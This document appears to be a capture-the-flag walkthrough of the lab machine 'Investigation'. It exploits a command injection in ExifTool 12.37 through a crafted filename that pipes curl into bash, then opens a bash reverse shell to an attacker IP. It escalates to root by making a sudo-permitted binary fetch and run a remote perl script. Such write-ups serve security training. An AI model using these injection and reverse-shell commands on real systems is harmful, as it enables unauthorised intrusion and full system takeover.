Investigation
Enumeration
Rustscan
mkdir rust; sudo rustscan -t 1500 -b 1500 --ulimit 65000 -a 10.129.87.222 -- -sV -sC -oA ./rust/{{ip}}Open 10.129.11.68:22
Open 10.129.11.68:80
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://eforenzics.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: eforenzics.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernelDirsearch
dirsearch -u http://eforenzics.htb/[20:42:57] Starting:
[20:43:24] 301 - 317B - /assets -> http://eforenzics.htb/assets/
[20:43:24] 403 - 279B - /assets/
[20:43:41] 200 - 11KB - /index.html
[20:44:08] 200 - 4KB - /upload.php Website
Checking the Website we notice that there's a service that they offer located at http://eforenzics.htb/service.html. The service is described as Image Forensics. You are able to upload an image file and they will provide a detailed forensic analysis.
Uploading an image will result in a report that you can view.
Example
ExifTool Version Number : 12.37
File Name : image.jpg
Directory : .
File Size : 335 bytes
File Modification Date/Time : 2023:01:23 20:03:07+00:00
File Access Date/Time : 2023:01:23 20:03:07+00:00
File Inode Change Date/Time : 2023:01:23 20:03:07+00:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Exif Byte Order : Big-endian (Motorola, MM)
X Resolution : 72
Y Resolution : 72
Resolution Unit : inches
Y Cb Cr Positioning : Centered
DjVu Version : 0.24
Spatial Resolution : 300
Gamma : 2.2
Orientation : Horizontal (normal)
Warning : Ignored invalid metadata entry(s)
Image Width : 1
Image Height : 1
Encoding Process : Extended sequential DCT, arithmetic coding
Bits Per Sample : 8
Color Components : 1
Image Size : 1x1
Megapixels : 0.000001The first line shows us the used ExifTool Version which is 12.37. If you look this up you'll come across Command Injection: Exiftool before 12.38
Exploitation
Using the discovered vulnerability we will try to gain a shell on our target.
Exiftool 12.37
# Generate malicious filename
cp image.jpg 'curl 10.10.14.71 | bash |'
# Generate an index.html containing our reverse shell code
cat index.html
/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.71/4444 0>&1"
# Host a webserver
python -m http.server 80
# In another tab create a listener
pwncat-cs -lp 4444Enumeration
After we received our shell it's time to enumerate the systmen as we are just the www-data user without any further permissions.
Linpeas
Linpeas will show us a cronjob that runs regularly at a specific time and uses a script located at /usr/local/investigation. Inside that folder we will find an E-Mail that contains a Windows Security Log.
Cronjob
*/5 * * * * date >> /usr/local/investigation/analysed_log && echo "Clearing folders" >> /usr/local/investigation/analysed_log && rm -r /var/www/uploads/* && rm /var/www/html/analysed_images/*Password Discovery
By searching the security.evtx file we come across something that looks like a password which is stored under TargetUserName.
# Convert .evtx to xml
python3 /home/mrk/.local/bin/evtx_dump.py ~/Downloads/security.evtx > events.xml
# Searching
grep "TargetUserName" events.xml | sort -u
...
<Data Name="TargetUserName">aanderson</Data>
<Data Name="TargetUserName">AAnderson</Data>
<Data Name="TargetUserName">Administrators</Data>
<Data Name="TargetUserName">CENSORED</Data>
<Data Name="TargetUserName">EFORENZICS-DI$</Data>
<Data Name="TargetUserName">hmarley</Data>
<Data Name="TargetUserName">HMarley</Data>
<Data Name="TargetUserName">hmraley</Data>
<Data Name="TargetUserName">ljenkins</Data>
<Data Name="TargetUserName">LJenkins</Data>
<Data Name="TargetUserName">lmonroe</Data>
<Data Name="TargetUserName">LMonroe</Data>
<Data Name="TargetUserName">LOCAL SERVICE</Data>Privilege Escalation: smorton
Using the password we are able to switch from www-data to smorton.
su - smortonPrivilege Escalation
Enumeration
Checking the permissiosn of smorton reveals that we are able to run /usr/bin/binary as root.
smorton@investigation:~$ sudo -l
Matching Defaults entries for smorton on investigation:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User smorton may run the following commands on investigation:
(root) NOPASSWD: /usr/bin/binaryAnalyzing /usr/bin/binary
Executing the binary does result in receiving the text Exiting...
We pull that binary to our machine and use Cutter to take a look at the decompiled code.
Snippet of decompiled function: main
if (argc != 3) {
puts("Exiting... ");
exit(0);
}
iVar1 = getuid();
if (iVar1 != 0) {
puts("Exiting... ");
exit(0);
}
iVar1 = strcmp(argv[2], "lDnxUysaQn");
if (iVar1 == 0) {
puts("Running... ");
uVar2 = fopen(argv[2], 0x2027);
uVar3 = curl_easy_init();
curl_easy_setopt(uVar3, 0x2712, argv[1]);
curl_easy_setopt(uVar3, 0x2711, uVar2);
curl_easy_setopt(uVar3, 0x2d, 1);
iVar1 = curl_easy_perform(uVar3);
if (iVar1 == 0) {
iVar1 = snprintf(0, 0, 0x202a, argv[2]);
uVar4 = malloc((int64_t)iVar1 + 1);
snprintf(uVar4, (int64_t)iVar1 + 1, 0x202a, argv[2]);
iVar1 = snprintf(0, 0, "perl ./%s", uVar4);
uVar5 = malloc((int64_t)iVar1 + 1);
snprintf(uVar5, (int64_t)iVar1 + 1, "perl ./%s", uVar4);
fclose(uVar2);
.plt.sec(uVar3);
setuid(0);
system(uVar5);
system("rm -f ./lDnxUysaQn");
return 0;
}
puts("Exiting... ");
exit(0);
}
puts("Exiting... ");
exit(0);
return 0;I'm not a pro at asm or c but looking at the code it's clear to me that we have to:
Provide 2 additional arguments
argv[1] should be a perl script hosted on a web resource
argv[2] has to be the string lDnxUysaQn
Become Root
root.pl
Let's prepare a simple perl script to get a root shell
exec "/bin/bash";Python Webserver
Host a webserver to serve that file
python3 -m http.server 8080Privilege Escalation
The fun part, let's become root
smorton@investigation:~$ /bin/sudo /usr/bin/binary http://10.10.14.52:8080/root.pl lDnxUysaQn
Running...
root@investigation:/home/smorton# whoami
rootLast updated